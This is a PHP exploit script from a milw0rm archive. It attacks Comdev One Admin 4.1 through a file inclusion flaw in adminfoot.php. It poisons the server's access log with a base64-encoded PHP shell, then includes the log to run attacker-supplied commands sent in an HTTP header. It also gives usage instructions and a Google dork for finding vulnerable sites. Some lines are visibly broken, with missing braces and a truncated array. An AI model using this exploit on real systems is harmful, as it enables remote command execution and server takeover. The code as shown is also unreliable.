* Comdev One Admin 4.1 Remote Command Execution / File Inclusion Vulnerability
* Note:
* Requires register globals to be on, and magic quotes gpc to be off.
* Usage:
* php script.php [host] [path] [command]
* Usage Example:
* php script.php domain.com /oneadminpro/ whoami
* Credit:
* Synsta - Vulnerability discovery and exploit scripting
* File Inclusion:
* <host>/<path>/oneadmin/adminfoot.php?path[docroot]=<local/remote file>
* Googledork: inurl:/oneadmin/
* [w4ck1ng] - w4ck1ng.com
if(!$argv[3 ]){
php $argv[0] [host] [path] [command]\n
Usage Example:
php $argv[0] domain.com /dolphin/ whoami\n");
function send($host, $put){
global $data;
$conn = fsockopen( gethostbyname($host),"80" );
if(!$conn) {
die("Connection to $host failed...");
fputs($conn, $put);
while(!feof($conn)) {
$data .=fgets( $conn);
return $data;
$host = $argv[ 1];
$path = $argv[ 2];
$cmd = $argv[ 3];
$shellcode = base64_decode( "PD9waHAgaWYoJF9TRVJWRVJbSFRUUF9DTURdKXsgZWNobyBjbWR4cGxzdGFydC5zaGVsbF9leGVjKHN0cmlwc2xhc2hlcygkX1NFUlZFUltIVFRQX0NNRF0pKS5jbWR4cGxlbmQ7IH0gPz4=");
$req = "GET ". $path."/oneadmin/adminfoot.php?path[docroot]=$shellcode HTTP/1.1\r\n";
$req .="Accept-Encoding: text/plain\r\n" ;
$req .="Host: ". $host."\r\n";
$req .="Connection: Close\r\n\r\n" ;
send("$host", "$req");
$logs = array("../../../../../var/log/httpd/access_log" ,
$i = 0;
foreach($logs as $value){
$req = "GET ". $path."/oneadmin/adminfoot.php?path[docroot]=$logs[$i]%00 HTTP/1.1\r\n";
$req .="CMD: $cmd\r\n";
$req .="Accept-Encoding: text/plain\r\n" ;
$req .="Host: ". $host."\r\n";
$req .="Connection: Close\r\n\r\n" ;
send("$host", "$req");
print("Trying $logs[$i]..\n");
$adata = explode( "cmdxplstart",$data);
$bdata = explode( "cmdxplend",$adata[1 ]);
$cdata = $bdata[ 0];
if(eregi("cmdxplend", $data)){
die("\nExploit succeeded but blank command received..\n");
die("\nExploit Succeeded!\n\nCommand Resolution:\n$cdata\n");
die("Exploit Failed!\n");
# milw0rm.com [2006-10-16]